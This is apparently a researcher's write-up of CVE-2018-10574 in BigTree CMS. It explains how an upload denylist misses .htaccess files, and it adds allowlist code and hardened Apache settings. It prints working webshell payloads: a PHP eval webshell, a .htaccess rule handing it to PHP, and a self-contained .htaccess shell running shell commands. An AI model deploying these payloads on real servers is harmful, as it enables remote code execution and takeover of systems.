Code Audit – CVE-2018-10574

As the second CVE ID I have owned, CVE-2018-10574 identifies an arbitrary code execution vulnerability in BigTree CMS, developed by Fastspot. Here are some places to get more details about this CVE.

Here I would like to share how I found this vulnerability and exploited it to get a webshell and compromise the whole system. Its CVSS v3.0 base score is 9.8, which puts it in the critical range.

I found the vulnerability by code audit.

At the very beginning, I was trying to find SQL injection vulnerabilities. I looked into how parameters are prepared and checked whether every parameter coming from the client is handled, searching for keywords like $_GET[], $_POST[] and $_REQUEST in the hope of finding incomplete handling. Disappointingly, I got nothing. Then I started to go through other components.

After auditing several parts of the project, I found a place used for uploading files. The code was written like this.

In /core/admin/ajax/file-browser/upload.php, I got this.

$storage = new BigTreeStorage;

I looked into the definition of the class BigTreeStorage, and got this.

class BigTreeStorage {

    var $AutoJPEG = false;
    var $DisabledFileError = false;
    var $DisabledExtensionRegEx = '/\\.(exe|com|bat|php|rb|py|cgi|pl|sh|asp|aspx|phtml|pht)/i';
    var $Service = "";
    var $Cloud = false;
    var $Settings;
......
......
    function store($local_file,$file_name,$relative_path,$remove_original = true,$prefixes = array()) {
        // Make sure there are no path exploits
        $file_name = BigTree::cleanFile($file_name);

        // If the file name ends in a disabled extension, fail.
        if (preg_match($this->DisabledExtensionRegEx, $file_name)) {
            $this->DisabledFileError = true;
            unlink($local_file);
            return false;
        }


As we can see, preg_match is used to reject uploads whose name contains one of the listed extensions: it is a denylist filter on the file extension (not a whitelist, even though it is often described as one). Since files with the extensions php, phtml and pht are refused, the measure looks adequate at first glance. However, a denylist only blocks what its authors thought of, and the programmers forgot something.
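To make the gap concrete, here is an added example that is not BigTree's code: the denylist pattern from store() above, applied as a plain PHP function, beside an allowlist-based check that also refuses dotfiles and names with a missing or trailing extension. The sample file names are constructed for this demo, and the set of allowed extensions is an assumption chosen for illustration.

```php
<?php
// Added example, not BigTree's code. It contrasts the page's denylist check
// with an allowlist check on constructed file names.

// 1. The original check: an unanchored denylist of "bad" extensions.
//    In a single-quoted PHP string "\\." becomes the regex "\.".
const DISABLED_EXTENSION_REGEX = '/\\.(exe|com|bat|php|rb|py|cgi|pl|sh|asp|aspx|phtml|pht)/i';

function denylist_allows(string $file_name): bool {
    return preg_match(DISABLED_EXTENSION_REGEX, $file_name) !== 1;
}

// 2. A hardened check: accept only known-safe extensions and refuse dotfiles.
//    The list is an assumption for the demo; tailor it to what the site serves.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

function allowlist_allows(string $file_name): bool {
    // Dotfiles are configuration, not content: .htaccess, .user.ini, ...
    if ($file_name === '' || $file_name[0] === '.') {
        return false;
    }
    $parts = explode('.', $file_name);
    // Require a base name plus at least one non-empty extension, so
    // "haozhe" and "haozhe." are refused.
    if (count($parts) < 2 || in_array('', $parts, true)) {
        return false;
    }
    // Every extension after the base name must be allowlisted, because
    // mod_mime looks at all of them: "shell.php.jpg" can still be handed
    // to PHP by an AddHandler rule.
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array(strtolower($ext), ALLOWED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

// Constructed sample names, including the ones that matter for this CVE.
$samples = [
    'photo.jpg', 'notes.txt', 'shell.php', 'shell.PHP', 'shell.phtml',
    'shell.php.jpg', '.htaccess', '.user.ini', 'haozhe.', 'haozhe',
];

printf("%-16s %-9s %-9s\n", 'file name', 'denylist', 'allowlist');
foreach ($samples as $name) {
    printf("%-16s %-9s %-9s\n", $name,
        denylist_allows($name) ? 'accept' : 'reject',
        allowlist_allows($name) ? 'accept' : 'reject');
}
```

Run with php on the command line. The denylist column accepts .htaccess, .user.ini, haozhe. and haozhe, which is exactly the hole exploited below, while the allowlist column rejects all of them. The most robust fix goes one step further and ignores the client-supplied name altogether, storing the file under a server-generated name with an extension taken from the validated content type.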

.htaccess files (or “distributed configuration files”) provide a way to make configuration changes on a per-directory basis. A file, containing one or more configuration directives, is placed in a particular document directory, and the directives apply to that directory, and all subdirectories thereof.

Since Apache honours .htaccess and the filter places no restriction on that file name, you can upload a .htaccess file that changes the per-directory configuration so that the PHP interpreter executes files of your choosing as PHP code, whatever their extension. This is a commonly seen trick in CTF games. Two conditions apply: the upload directory must be served by Apache, and AllowOverride for that directory must permit FileInfo, which is what SetHandler and AddType need. With AllowOverride None the uploaded .htaccess is simply ignored.
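As an added example that is not from the original post or from the BigTree project, here is the Apache side of the issue: the per-directory setting that lets an uploaded .htaccess take effect, beside a configuration that neutralises it regardless of what the application-level filter lets through. The directory path is an assumption; point it at the real upload location of your install. The php_admin_flag line exists only when PHP runs as mod_php; with php-fpm, remove it (Apache refuses to start on an unknown directive) and keep the PHP handler mapping out of the upload tree by whatever means your setup uses.

```apache
# Added example, not from the original post or from BigTree. The directory
# path is an assumption. Use ONE of the two Directory blocks, not both.

# Weak: .htaccess files under the upload tree are honoured, so an uploaded
# .htaccess can map any name (or itself) to the PHP handler with SetHandler
# or AddType, and re-open the default ".ht*" deny rule with a <Files> block.
<Directory "/var/www/bigtree/site/files">
    AllowOverride All
</Directory>

# Hardened: ignore .htaccess entirely, keep PHP off for this tree, and never
# serve dotfiles from it.
<Directory "/var/www/bigtree/site/files">
    AllowOverride None
    # mod_php only: php_admin_flag cannot be undone from .htaccess or ini_set().
    php_admin_flag engine off
    # Apache 2.4 syntax; on 2.2 use "Order allow,deny" and "Deny from all".
    <FilesMatch "^\.">
        Require all denied
    </FilesMatch>
</Directory>
```

With the hardened block in place, both payloads shown below are inert: the uploaded .htaccess is never read, and even a file that does reach the PHP handler by some other route is served as static content in this tree.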

Now what you need is to upload a customized .htaccess file and a webshell. Of course, you can also combine the two into one file.

Two Files

File 1: haozhe. (the name ends in a dot)

<script language="php">eval($_GET['cmd']); phpinfo();</script>

File 2: .htaccess

# Apache does not allow a comment after a directive on the same line, so the
# note goes here: the pattern is matched against "haozhe." (dot included).
<FilesMatch "haozhe.">
	SetHandler application/x-httpd-php
</FilesMatch>

Then the file haozhe. is handed to the PHP interpreter and treated as PHP source, so you can execute arbitrary PHP code. Getshell! Two caveats: the dot in the FilesMatch pattern is an unescaped regex metacharacter and the pattern is unanchored, so the rule also matches any name that starts with haozhe followed by at least one character; and the <script language="php"> opening tag was removed in PHP 7.0, so against a PHP 7 or later target write the payload with the ordinary <?php ... ?> tags instead.

One File

What you need to do is combine the two files into one. The file must be named .htaccess, and the PHP code goes inside it. Then, getshell! The example below is Wireghoul's self-contained .htaccess shell from the htshell project. Note that Order allow,deny and Allow from all are Apache 2.2 access-control syntax: on Apache 2.4 they only work when mod_access_compat is loaded, and in either version the .htaccess must be permitted to set them (AllowOverride Limit) as well as the handler (AllowOverride FileInfo).

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make the .htaccess file be interpreted as a PHP file. This occurs after Apache has
# interpreted the Apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Getshell
